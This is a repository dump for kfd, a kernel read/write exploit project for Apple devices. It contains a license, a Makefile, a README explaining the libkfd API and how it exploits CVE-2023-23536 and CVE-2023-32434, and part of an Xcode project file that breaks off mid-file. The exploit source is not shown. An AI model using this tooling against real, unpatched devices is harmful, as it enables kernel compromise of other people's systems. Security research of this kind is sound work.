├── .gitignore ├── LICENSE ├── Makefile ├── README.md ├── kfd.xcodeproj ├── project.pbxproj └── project.xcworkspace │ ├── contents.xcworkspacedata │ └── xcshareddata │ └── IDEWorkspaceChecks.plist ├── kfd ├── Assets.xcassets │ ├── AccentColor.colorset │ │ └── Contents.json │ ├── AppIcon.appiconset │ │ └── Contents.json │ └── Contents.json ├── ContentView.swift ├── Preview Content │ └── Preview Assets.xcassets │ │ └── Contents.json ├── kfd-Bridging-Header.h ├── kfd.entitlements ├── kfdApp.swift ├── libkfd.h └── libkfd │ ├── common.h │ ├── info.h │ ├── info │ ├── dynamic_types │ │ ├── kqworkloop.h │ │ ├── proc.h │ │ ├── task.h │ │ ├── thread.h │ │ ├── uthread.h │ │ └── vm_map.h │ └── static_types │ │ ├── fileglob.h │ │ ├── fileops.h │ │ ├── fileproc.h │ │ ├── fileproc_guard.h │ │ ├── ipc_entry.h │ │ ├── ipc_port.h │ │ ├── ipc_space.h │ │ ├── miscellaneous_types.h │ │ ├── pmap.h │ │ ├── pseminfo.h │ │ ├── psemnode.h │ │ ├── semaphore.h │ │ ├── vm_map_copy.h │ │ ├── vm_map_entry.h │ │ ├── vm_named_entry.h │ │ ├── vm_object.h │ │ └── vm_page.h │ ├── krkw.h │ ├── krkw │ ├── kread │ │ ├── kread_kqueue_workloop_ctl.h │ │ └── kread_sem_open.h │ └── kwrite │ │ ├── kwrite_dup.h │ │ └── kwrite_sem_open.h │ ├── perf.h │ ├── puaf.h │ └── puaf │ ├── physpuppet.h │ └── smith.h ├── macos_kfd.c └── writeups ├── exploiting-puafs.md ├── figures ├── exploiting-puafs-figure1.png ├── exploiting-puafs-figure2.png ├── physpuppet-figure1.png ├── physpuppet-figure2.png ├── physpuppet-figure3.png ├── physpuppet-figure4.png ├── physpuppet-figure5.png ├── physpuppet-figure6.png ├── smith-figure1.png ├── smith-figure2.png ├── smith-figure3.png └── smith-figure4.png ├── physpuppet.md └── smith.md /.gitignore: -------------------------------------------------------------------------------- 1 | macos_kfd 2 | xcuserdata 3 | -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | 
MIT License 2 | 3 | Copyright (c) 2023 Félix Poulin-Bélanger 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | -------------------------------------------------------------------------------- /Makefile: -------------------------------------------------------------------------------- 1 | b: 2 | clang -O3 -Wno-deprecated-declarations -o macos_kfd macos_kfd.c 3 | 4 | r: 5 | sync 6 | ./macos_kfd 7 | 8 | br: 9 | make b 10 | make r 11 | 12 | s: 13 | sudo sysctl kern.maxfiles=262144 14 | sudo sysctl kern.maxfilesperproc=262144 15 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # kfd 2 | 3 | kfd, short for kernel file descriptor, is a project to read and write kernel memory on Apple 4 | devices. 
It leverages various vulnerabilities that can be exploited to obtain dangling PTEs, which 5 | will be referred to as a PUAF primitive, short for "physical use-after-free". Then, it reallocates 6 | certain kernel objects inside those physical pages and manipulates them directly from user space 7 | through the dangling PTEs in order to achieve a KRKW primitive, short for "kernel read/write". The 8 | exploit code is fully contained in a library, [libkfd](kfd/libkfd.h), but the project also contains 9 | simple executable wrappers for [iOS](kfd/ContentView.swift) and [macOS](macos_kfd.c). The public API 10 | of libkfd is quite small and intuitive: 11 | 12 | ```c 13 | enum puaf_method { 14 | puaf_physpuppet, 15 | puaf_smith, 16 | }; 17 | 18 | enum kread_method { 19 | kread_kqueue_workloop_ctl, 20 | kread_sem_open, 21 | }; 22 | 23 | enum kwrite_method { 24 | kwrite_dup, 25 | kwrite_sem_open, 26 | }; 27 | 28 | u64 kopen(u64 puaf_pages, u64 puaf_method, u64 kread_method, u64 kwrite_method); 29 | void kread(u64 kfd, u64 kaddr, void* uaddr, u64 size); 30 | void kwrite(u64 kfd, void* uaddr, u64 kaddr, u64 size); 31 | void kclose(u64 kfd); 32 | ``` 33 | 34 | `kopen()` conceptually opens a "kernel file descriptor". It takes the following 4 arguments: 35 | 36 | - `puaf_pages`: The target number of physical pages with dangling PTEs. 37 | - `puaf_method`: The method used to obtain the PUAF primitive, with the following options: 38 | - `puaf_physpuppet`: 39 | - This method exploits [CVE-2023-23536][1]. 40 | - Fixed in iOS 16.4 and macOS 13.3. 41 | - Reachable from the App Sandbox but not the WebContent sandbox. 42 | - `puaf_smith`: 43 | - This method exploits [CVE-2023-32434][2]. 44 | - Fixed in iOS 16.5.1 and macOS 13.4.1. 45 | - Reachable from the WebContent sandbox and might have been actively exploited. 46 | - `kread_method`: The method used to obtain the initial `kread()` primitive. 47 | - `kwrite_method`: The method used to obtain the initial `kwrite()` primitive. 
48 | 49 | If the exploit is successful, `kopen()` returns a 64-bit opaque file descriptor. In practice, this 50 | is just a user space pointer to a structure needed by libkfd. However, since that structure should 51 | not be accessed outside of the library, it is returned as an opaque integer. If the exploit is 52 | unsuccessful, the library will print an error message, sleep for 30 seconds, then exit with a status 53 | code of 1. It sleeps for 30 seconds because the kernel might panic on exit for certain PUAF methods 54 | that require some cleanup post-KRKW (e.g. `puaf_smith`). 55 | 56 | `kread()` and `kwrite()` are the user space equivalent of `copyout()` and `copyin()`, respectively. 57 | Please note that the options for `kread_method` and `kwrite_method` are described in a separate 58 | [write-up](writeups/exploiting-puafs.md). In addition, the initial primitives granted by those 59 | methods can be used to bootstrap a better KRKW primitive. Finally, `kclose()` simply closes the 60 | kernel file descriptor. They all take the opaque integer returned by `kopen()` as their first 61 | argument. 62 | 63 | [1]: https://support.apple.com/en-us/HT213676 64 | [2]: https://support.apple.com/en-us/HT213814 65 | 66 | --- 67 | 68 | ## What are the supported OS versions and devices? 69 | 70 | The later stage of the exploit makes use of various offsets. For the structures that have identical 71 | offsets across all versions that I tested, I simply included their definitions under the 72 | [static_types](kfd/libkfd/info/static_types/) folder. For the structures that have different 73 | offsets, I built offset tables for them under the [dynamic_types](kfd/libkfd/info/dynamic_types/) 74 | folder. Then, I map the "kern.osversion" of the device to the appropriate index for those offset 75 | tables. Please check the function `info_init()`, located in [info.h](kfd/libkfd/info.h), for the 76 | list of currently supported iOS and macOS versions. 
However, please note that I only tested the 77 | exploits on an iPhone 14 Pro Max and a MacBook Air (M2 2022). Therefore, it is possible that the 78 | offsets are actually different on other devices, even for the same OS version. Keep this in mind if 79 | you get a "Kernel data abort" panic on a "supported" version. Fortunately, those offsets should all 80 | be easily retrievable from the XNU source code. 81 | 82 | On the other hand, in order to bootstrap the better KRKW primitive, the exploit makes use of certain 83 | static addresses which must be retrieved from the kernelcache. This is a tedious process, which I 84 | only carried out for the kernelcaches of certain iOS versions on the iPhone 14 Pro Max. Please check 85 | the function `perf_init()`, located in [perf.h](kfd/libkfd/perf.h), for the list of currently 86 | supported versions. Note that none of the exploits require the better KRKW primitive in order to 87 | succeed. However, if you plan on doing research based on this project, then it is probably 88 | worthwhile to add support for the better KRKW primitive for your own device! 89 | 90 | --- 91 | 92 | ## How to build and run kfd on an iPhone? 93 | 94 | In Xcode, open the root folder of the project and connect your iOS device. 95 | 96 | - To build the project, select Product > Build (⌘B). 97 | - To run the project, select Product > Run (⌘R), then click on the "kopen" button in the app. 98 | 99 | --- 100 | 101 | ## How to build and run kfd on a Mac? 102 | 103 | In a terminal, navigate to the root folder of the project. 104 | 105 | Optionally, to increase the global and per-process file descriptor limits, which will improve the 106 | success rate especially on multiple consecutive runs, enter the command `make s` and type in the 107 | sudo password. 108 | 109 | - To build the project, enter the command `make b`. 110 | - To run the project, enter the command `make r`. 111 | - To build and run the project at once, enter the command `make br`. 
112 | 113 | --- 114 | 115 | ## Where to find detailed write-ups for the exploits? 116 | 117 | This README presented a high-level overview of the kfd project. Once a PUAF primitive has been 118 | achieved, the rest of the exploit is generic. Therefore, I have hoisted the common part of the 119 | exploits in a dedicated write-up: 120 | 121 | - [Exploiting PUAFs](writeups/exploiting-puafs.md) 122 | 123 | In addition, I have split the vulnerability-specific part of the exploits used to achieve the PUAF 124 | primitive into distinct write-ups, listed below in chronological order of discovery: 125 | 126 | - [PhysPuppet](writeups/physpuppet.md) 127 | - [Smith](writeups/smith.md) 128 | 129 | However, please note that these write-ups have been written for an audience that is already familiar 130 | with the XNU virtual memory system. 131 | -------------------------------------------------------------------------------- /kfd.xcodeproj/project.pbxproj: -------------------------------------------------------------------------------- 1 | // !$*UTF8*$! 
2 | { 3 | archiveVersion = 1; 4 | classes = { 5 | }; 6 | objectVersion = 56; 7 | objects = { 8 | 9 | /* Begin PBXBuildFile section */ 10 | 297BA1092A310AE100D1E51A /* kfdApp.swift in Sources */ = {isa = PBXBuildFile; fileRef = 297BA1082A310AE100D1E51A /* kfdApp.swift */; }; 11 | 297BA10B2A310AE100D1E51A /* ContentView.swift in Sources */ = {isa = PBXBuildFile; fileRef = 297BA10A2A310AE100D1E51A /* ContentView.swift */; }; 12 | 297BA10D2A310AE200D1E51A /* Assets.xcassets in Resources */ = {isa = PBXBuildFile; fileRef = 297BA10C2A310AE200D1E51A /* Assets.xcassets */; }; 13 | 297BA1112A310AE200D1E51A /* Preview Assets.xcassets in Resources */ = {isa = PBXBuildFile; fileRef = 297BA1102A310AE200D1E51A /* Preview Assets.xcassets */; }; 14 | /* End PBXBuildFile section */ 15 | 16 | /* Begin PBXFileReference section */ 17 | 29125B6F2A4C807F0031761B /* miscellaneous_types.h */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.h; path = miscellaneous_types.h; sourceTree = ""; }; 18 | 29125B712A4DD3940031761B /* fileops.h */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.h; path = fileops.h; sourceTree = ""; }; 19 | 2948BA6E2A3162FD00B2ED3C /* common.h */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.h; path = common.h; sourceTree = ""; }; 20 | 2948BA6F2A31630800B2ED3C /* info.h */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.h; path = info.h; sourceTree = ""; }; 21 | 2948BA702A31631000B2ED3C /* krkw.h */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.h; path = krkw.h; sourceTree = ""; }; 22 | 2948BA712A31631C00B2ED3C /* puaf.h */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.h; path = puaf.h; sourceTree = ""; }; 23 | 2948BA722A31636600B2ED3C /* physpuppet.h */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.h; path = physpuppet.h; sourceTree = ""; }; 24 | 2948BA762A3163AB00B2ED3C /* kread_kqueue_workloop_ctl.h */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.h; path = 
kread_kqueue_workloop_ctl.h; sourceTree = ""; }; 25 | 2948BA772A3163B900B2ED3C /* kread_sem_open.h */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.h; path = kread_sem_open.h; sourceTree = ""; }; 26 | 2948BA782A3163C500B2ED3C /* kwrite_dup.h */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.h; path = kwrite_dup.h; sourceTree = ""; }; 27 | 2948BA792A3163D200B2ED3C /* kwrite_sem_open.h */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.h; path = kwrite_sem_open.h; sourceTree = ""; }; 28 | 2948BA7C2A31644B00B2ED3C /* kqworkloop.h */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.h; path = kqworkloop.h; sourceTree = ""; }; 29 | 2948BA7D2A31647D00B2ED3C /* proc.h */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.h; path = proc.h; sourceTree = ""; }; 30 | 2948BA7E2A31649400B2ED3C /* task.h */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.h; path = task.h; sourceTree = ""; }; 31 | 2948BA812A3164CC00B2ED3C /* vm_map.h */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.h; path = vm_map.h; sourceTree = ""; }; 32 | 2948BA822A3164E900B2ED3C /* fileproc_guard.h */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.h; path = fileproc_guard.h; sourceTree = ""; }; 33 | 2948BA832A3164FD00B2ED3C /* fileproc.h */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.h; path = fileproc.h; sourceTree = ""; }; 34 | 2948BA842A31651700B2ED3C /* pseminfo.h */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.h; path = pseminfo.h; sourceTree = ""; }; 35 | 2948BA852A31652700B2ED3C /* psemnode.h */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.h; path = psemnode.h; sourceTree = ""; }; 36 | 2948BA862A31653C00B2ED3C /* semaphore.h */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.h; path = semaphore.h; sourceTree = ""; }; 37 | 2948BA872A31655600B2ED3C /* vm_map_entry.h */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.h; path = 
vm_map_entry.h; sourceTree = ""; }; 38 | 2965065D2A31565B0025D1A7 /* kfd-Bridging-Header.h */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.h; path = "kfd-Bridging-Header.h"; sourceTree = ""; }; 39 | 2965065E2A31565B0025D1A7 /* libkfd.h */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.h; path = libkfd.h; sourceTree = ""; }; 40 | 297BA1052A310AE100D1E51A /* kfd.app */ = {isa = PBXFileReference; explicitFileType = wrapper.application; includeInIndex = 0; path = kfd.app; sourceTree = BUILT_PRODUCTS_DIR; }; 41 | 297BA1082A310AE100D1E51A /* kfdApp.swift */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.swift; path = kfdApp.swift; sourceTree = ""; }; 42 | 297BA10A2A310AE100D1E51A /* ContentView.swift */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.swift; path = ContentView.swift; sourceTree = ""; }; 43 | 297BA10C2A310AE200D1E51A /* Assets.xcassets */ = {isa = PBXFileReference; lastKnownFileType = folder.assetcatalog; path = Assets.xcassets; sourceTree = ""; }; 44 | 297BA10E2A310AE200D1E51A /* kfd.entitlements */ = {isa = PBXFileReference; lastKnownFileType = text.plist.entitlements; path = kfd.entitlements; sourceTree = ""; }; 45 | 297BA1102A310AE200D1E51A /* Preview Assets.xcassets */ = {isa = PBXFileReference; lastKnownFileType = folder.assetcatalog; path = "Preview Assets.xcassets"; sourceTree = ""; }; 46 | 29A358F32A43B53300C297A1 /* smith.h */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.h; path = smith.h; sourceTree = ""; }; 47 | 29A53F692A32255600BC9544 /* thread.h */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.h; path = thread.h; sourceTree = ""; }; 48 | 29A53F6A2A32255E00BC9544 /* uthread.h */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.h; path = uthread.h; sourceTree = ""; }; 49 | 29A765292A393FCB006617E8 /* perf.h */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.h; path = perf.h; sourceTree = ""; }; 50 | 29A7652B2A3943AB006617E8 /* fileglob.h */ = 
{isa = PBXFileReference; lastKnownFileType = sourcecode.c.h; path = fileglob.h; sourceTree = ""; }; 51 | 29A7652C2A3943B5006617E8 /* ipc_entry.h */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.h; path = ipc_entry.h; sourceTree = ""; }; 52 | 29A7652D2A3943BD006617E8 /* ipc_port.h */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.h; path = ipc_port.h; sourceTree = ""; }; 53 | 29A7652E2A3943CB006617E8 /* ipc_space.h */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.h; path = ipc_space.h; sourceTree = ""; }; 54 | 29A7652F2A3943DC006617E8 /* pmap.h */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.h; path = pmap.h; sourceTree = ""; }; 55 | 29A765302A3943EB006617E8 /* vm_map_copy.h */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.h; path = vm_map_copy.h; sourceTree = ""; }; 56 | 29A765312A3943F6006617E8 /* vm_named_entry.h */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.h; path = vm_named_entry.h; sourceTree = ""; }; 57 | 29A765322A394407006617E8 /* vm_object.h */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.h; path = vm_object.h; sourceTree = ""; }; 58 | 29A765332A394412006617E8 /* vm_page.h */ = {isa = PBXFileReference; lastKnownFileType = sourcecode.c.h; path = vm_page.h; sourceTree = ""; }; 59 | /* End PBXFileReference section */ 60 | 61 | /* Begin PBXFrameworksBuildPhase section */ 62 | 297BA1022A310AE100D1E51A /* Frameworks */ = { 63 | isa = PBXFrameworksBuildPhase; 64 | buildActionMask = 2147483647; 65 | files = ( 66 | ); 67 | runOnlyForDeploymentPostprocessing = 0; 68 | }; 69 | /* End PBXFrameworksBuildPhase section */ 70 | 71 | /* Begin PBXGroup section */ 72 | 2948BA6A2A3162C600B2ED3C /* libkfd */ = { 73 | isa = PBXGroup; 74 | children = ( 75 | 2948BA6E2A3162FD00B2ED3C /* common.h */, 76 | 2948BA6B2A3162DE00B2ED3C /* info */, 77 | 2948BA6F2A31630800B2ED3C /* info.h */, 78 | 2948BA6C2A3162E400B2ED3C /* krkw */, 79 | 2948BA702A31631000B2ED3C /* krkw.h */, 80 | 
29A765292A393FCB006617E8 /* perf.h */, 81 | 2948BA6D2A3162E900B2ED3C /* puaf */, 82 | 2948BA712A31631C00B2ED3C /* puaf.h */, 83 | ); 84 | path = libkfd; 85 | sourceTree = ""; 86 | }; 87 | 2948BA6B2A3162DE00B2ED3C /* info */ = { 88 | isa = PBXGroup; 89 | children = ( 90 | 2948BA7B2A31642200B2ED3C /* dynamic_types */, 91 | 2948BA7A2A31641B00B2ED3C /* static_types */, 92 | ); 93 | path = info; 94 | sourceTree = ""; 95 | }; 96 | 2948BA6C2A3162E400B2ED3C /* krkw */ = { 97 | isa = PBXGroup; 98 | children = ( 99 | 2948BA742A31639800B2ED3C /* kread */, 100 | 2948BA752A31639D00B2ED3C /* kwrite */, 101 | ); 102 | path = krkw; 103 | sourceTree = ""; 104 | }; 105 | 2948BA6D2A3162E900B2ED3C /* puaf */ = { 106 | isa = PBXGroup; 107 | children = ( 108 | 2948BA722A31636600B2ED3C /* physpuppet.h */, 109 | 29A358F32A43B53300C297A1 /* smith.h */, 110 | ); 111 | path = puaf; 112 | sourceTree = ""; 113 | }; 114 | 2948BA742A31639800B2ED3C /* kread */ = { 115 | isa = PBXGroup; 116 | children = ( 117 | 2948BA762A3163AB00B2ED3C /* kread_kqueue_workloop_ctl.h */, 118 | 2948BA772A3163B900B2ED3C /* kread_sem_open.h */, 119 | ); 120 | path = kread; 121 | sourceTree = ""; 122 | }; 123 | 2948BA752A31639D00B2ED3C /* kwrite */ = { 124 | isa = PBXGroup; 125 | children = ( 126 | 2948BA782A3163C500B2ED3C /* kwrite_dup.h */, 127 | 2948BA792A3163D200B2ED3C /* kwrite_sem_open.h */, 128 | ); 129 | path = kwrite; 130 | sourceTree = ""; 131 | }; 132 | 2948BA7A2A31641B00B2ED3C /* static_types */ = { 133 | isa = PBXGroup; 134 | children = ( 135 | 29A7652B2A3943AB006617E8 /* fileglob.h */, 136 | 29125B712A4DD3940031761B /* fileops.h */, 137 | 2948BA822A3164E900B2ED3C /* fileproc_guard.h */, 138 | 2948BA832A3164FD00B2ED3C /* fileproc.h */, 139 | 29A7652C2A3943B5006617E8 /* ipc_entry.h */, 140 | 29A7652D2A3943BD006617E8 /* ipc_port.h */, 141 | 29A7652E2A3943CB006617E8 /* ipc_space.h */, 142 | 29125B6F2A4C807F0031761B /* miscellaneous_types.h */, 143 | 29A7652F2A3943DC006617E8 /* pmap.h */, 144 | 
2948BA842A31651700B2ED3C /* pseminfo.h */, 145 | 2948BA852A31652700B2ED3C /* psemnode.h */, 146 | 2948BA862A31653C00B2ED3C /* semaphore.h */, 147 | 29A765302A3943EB006617E8 /* vm_map_copy.h */, 148 | 2948BA872A31655600B2ED3C /* vm_map_entry.h */, 149 | 29A765312A3943F6006617E8 /* vm_named_entry.h */, 150 | 29A765322A394407006617E8 /* vm_object.h */, 151 | 29A765332A394412006617E8 /* vm_page.h */, 152 | ); 153 | path = static_types; 154 | sourceTree = ""; 155 | }; 156 | 2948BA7B2A31642200B2ED3C /* dynamic_types */ = { 157 | isa = PBXGroup; 158 | children = ( 159 | 2948BA7C2A31644B00B2ED3C /* kqworkloop.h */, 160 | 2948BA7D2A31647D00B2ED3C /* proc.h */, 161 | 2948BA7E2A31649400B2ED3C /* task.h */, 162 | 29A53F692A32255600BC9544 /* thread.h */, 163 | 29A53F6A2A32255E00BC9544 /* uthread.h */, 164 | 2948BA812A3164CC00B2ED3C /* vm_map.h */, 165 | ); 166 | path = dynamic_types; 167 | sourceTree = ""; 168 | }; 169 | 297BA0FC2A310AE100D1E51A = { 170 | isa = PBXGroup; 171 | children = ( 172 | 297BA1072A310AE100D1E51A /* kfd */, 173 | 297BA1062A310AE100D1E51A /* Products */, 174 | ); 175 | sourceTree = ""; 176 | }; 177 | 297BA1062A310AE100D1E51A /* Products */ = { 178 | isa = PBXGroup; 179 | children = ( 180 | 297BA1052A310AE100D1E51A /* kfd.app */, 181 | ); 182 | name = Products; 183 | sourceTree = ""; 184 | }; 185 | 297BA1072A310AE100D1E51A /* kfd */ = { 186 | isa = PBXGroup; 187 | children = ( 188 | 297BA10C2A310AE200D1E51A /* Assets.xcassets */, 189 | 297BA10A2A310AE100D1E51A /* ContentView.swift */, 190 | 2965065D2A31565B0025D1A7 /* kfd-Bridging-Header.h */, 191 | 297BA10E2A310AE200D1E51A /* kfd.entitlements */, 192 | 297BA1082A310AE100D1E51A /* kfdApp.swift */, 193 | 2948BA6A2A3162C600B2ED3C /* libkfd */, 194 | 2965065E2A31565B0025D1A7 /* libkfd.h */, 195 | 297BA10F2A310AE200D1E51A /* Preview Content */, 196 | ); 197 | path = kfd; 198 | sourceTree = ""; 199 | }; 200 | 297BA10F2A310AE200D1E51A /* Preview Content */ = { 201 | isa = PBXGroup; 202 | children = ( 203 | 
297BA1102A310AE200D1E51A /* Preview Assets.xcassets */, 204 | ); 205 | path = "Preview Content"; 206 | sourceTree = ""; 207 | }; 208 | /* End PBXGroup section */ 209 | 210 | /* Begin PBXNativeTarget section */ 211 | 297BA1042A310AE100D1E51A /* kfd */ = { 212 | isa = PBXNativeTarget; 213 | buildConfigurationList = 297BA1142A310AE200D1E51A /* Build configuration list for PBXNativeTarget "kfd" */; 214 | buildPhases = ( 215 | 297BA1012A310AE100D1E51A /* Sources */, 216 | 297BA1022A310AE100D1E51A /* Frameworks */, 217 | 297BA1032A310AE100D1E51A /* Resources */, 218 | ); 219 | buildRules = ( 220 | ); 221 | dependencies = ( 222 | ); 223 | name = kfd; 224 | productName = kfd; 225 | productReference = 297BA1052A310AE100D1E51A /* kfd.app */; 226 | productType = "com.apple.product-type.application"; 227 | }; 228 | /* End PBXNativeTarget section */ 229 | 230 | /* Begin PBXProject section */ 231 | 297BA0FD2A310AE100D1E51A /* Project object */ = { 232 | isa = PBXProject; 233 | attributes = { 234 | BuildIndependentTargetsInParallel = 1; 235 | LastSwiftUpdateCheck = 1430; 236 | LastUpgradeCheck = 1430; 237 | TargetAttributes = { 238 | 297BA1042A310AE100D1E51A = { 239 | CreatedOnToolsVersion = 14.3.1; 240 | LastSwiftMigration = 1430; 241 | }; 242 | }; 243 | }; 244 | buildConfigurationList = 297BA1002A310AE100D1E51A /* Build configuration list for PBXProject "kfd" */; 245 | compatibilityVersion = "Xcode 14.0"; 246 | developmentRegion = en; 247 | hasScannedForEncodings = 0; 248 | knownRegions = ( 249 | en, 250 | Base, 251 | ); 252 | mainGroup = 297BA0FC2A310AE100D1E51A; 253 | productRefGroup = 297BA1062A310AE100D1E51A /* Products */; 254 | projectDirPath = ""; 255 | projectRoot = ""; 256 | targets = ( 257 | 297BA1042A310AE100D1E51A /* kfd */, 258 | ); 259 | }; 260 | /* End PBXProject section */ 261 | 262 | /* Begin PBXResourcesBuildPhase section */ 263 | 297BA1032A310AE100D1E51A /* Resources */ = { 264 | isa = PBXResourcesBuildPhase; 265 | buildActionMask = 2147483647; 266 | files = 
( 267 | 297BA1112A310AE200D1E51A /* Preview Assets.xcassets in Resources */, 268 | 297BA10D2A310AE200D1E51A /* Assets.xcassets in Resources */, 269 | ); 270 | runOnlyForDeploymentPostprocessing = 0; 271 | }; 272 | /* End PBXResourcesBuildPhase section */ 273 | 274 | /* Begin PBXSourcesBuildPhase section */ 275 | 297BA1012A310AE100D1E51A /* Sources */ = { 276 | isa = PBXSourcesBuildPhase; 277 | buildActionMask = 2147483647; 278 | files = ( 279 | 297BA10B2A310AE100D1E51A /* ContentView.swift in Sources */, 280 | 297BA1092A310AE100D1E51A /* kfdApp.swift in Sources */, 281 | ); 282 | runOnlyForDeploymentPostprocessing = 0; 283 | }; 284 | /* End PBXSourcesBuildPhase section */ 285 | 286 | /* Begin XCBuildConfiguration section */ 287 | 297BA1122A310AE200D1E51A /* Debug */ = { 288 | isa = XCBuildConfiguration; 289 | buildSettings = { 290 | ALWAYS_SEARCH_USER_PATHS = NO; 291 | CLANG_ANALYZER_NONNULL = YES; 292 | CLANG_ANALYZER_NUMBER_OBJECT_CONVERSION = YES_AGGRESSIVE; 293 | CLANG_CXX_LANGUAGE_STANDARD = "gnu++20"; 294 | CLANG_ENABLE_MODULES = YES; 295 | CLANG_ENABLE_OBJC_ARC = YES; 296 | CLANG_ENABLE_OBJC_WEAK = YES; 297 | CLANG_WARN_BLOCK_CAPTURE_AUTORELEASING = YES; 298 | CLANG_WARN_BOOL_CONVERSION = YES; 299 | CLANG_WARN_COMMA = YES; 300 | CLANG_WARN_CONSTANT_CONVERSION = YES; 301 | CLANG_WARN_DEPRECATED_OBJC_IMPLEMENTATIONS = YES; 302 | CLANG_WARN_DIRECT_OBJC_ISA_USAGE = YES_ERROR; 303 | CLANG_WARN_DOCUMENTATION_COMMENTS = YES; 304 | CLANG_WARN_EMPTY_BODY = YES; 305 | CLANG_WARN_ENUM_CONVERSION = YES; 306 | CLANG_WARN_INFINITE_RECURSION = YES; 307 | CLANG_WARN_INT_CONVERSION = YES; 308 | CLANG_WARN_NON_LITERAL_NULL_CONVERSION = YES; 309 | CLANG_WARN_OBJC_IMPLICIT_RETAIN_SELF = YES; 310 | CLANG_WARN_OBJC_LITERAL_CONVERSION = YES; 311 | CLANG_WARN_OBJC_ROOT_CLASS = YES_ERROR; 312 | CLANG_WARN_QUOTED_INCLUDE_IN_FRAMEWORK_HEADER = YES; 313 | CLANG_WARN_RANGE_LOOP_ANALYSIS = YES; 314 | CLANG_WARN_STRICT_PROTOTYPES = YES; 315 | CLANG_WARN_SUSPICIOUS_MOVE = YES; 316 | 
CLANG_WARN_UNGUARDED_AVAILABILITY = YES_AGGRESSIVE; 317 | CLANG_WARN_UNREACHABLE_CODE = YES; 318 | CLANG_WARN__DUPLICATE_METHOD_MATCH = YES; 319 | COPY_PHASE_STRIP = NO; 320 | DEBUG_INFORMATION_FORMAT = dwarf; 321 | ENABLE_STRICT_OBJC_MSGSEND = YES; 322 | ENABLE_TESTABILITY = YES; 323 | GCC_C_LANGUAGE_STANDARD = gnu11; 324 | GCC_DYNAMIC_NO_PIC = NO; 325 | GCC_NO_COMMON_BLOCKS = YES; 326 | GCC_OPTIMIZATION_LEVEL = 0; 327 | GCC_PREPROCESSOR_DEFINITIONS = ( 328 | "DEBUG=1", 329 | "$(inherited)", 330 | ); 331 | GCC_WARN_64_TO_32_BIT_CONVERSION = YES; 332 | GCC_WARN_ABOUT_RETURN_TYPE = YES_ERROR; 333 | GCC_WARN_UNDECLARED_SELECTOR = YES; 334 | GCC_WARN_UNINITIALIZED_AUTOS = YES_AGGRESSIVE; 335 | GCC_WARN_UNUSED_FUNCTION = YES; 336 | GCC_WARN_UNUSED_VARIABLE = YES; 337 | MTL_ENABLE_DEBUG_INFO = INCLUDE_SOURCE; 338 | MTL_FAST_MATH = YES; 339 | ONLY_ACTIVE_ARCH = YES; 340 | SWIFT_ACTIVE_COMPILATION_CONDITIONS = DEBUG; 341 | SWIFT_OPTIMIZATION_LEVEL = "-Onone"; 342 | }; 343 | name = Debug; 344 | }; 345 | 297BA1132A310AE200D1E51A /* Release */ = { 346 | isa = XCBuildConfiguration; 347 | buildSettings = { 348 | ALWAYS_SEARCH_USER_PATHS = NO; 349 | CLANG_ANALYZER_NONNULL = YES; 350 | CLANG_ANALYZER_NUMBER_OBJECT_CONVERSION = YES_AGGRESSIVE; 351 | CLANG_CXX_LANGUAGE_STANDARD = "gnu++20"; 352 | CLANG_ENABLE_MODULES = YES; 353 | CLANG_ENABLE_OBJC_ARC = YES; 354 | CLANG_ENABLE_OBJC_WEAK = YES; 355 | 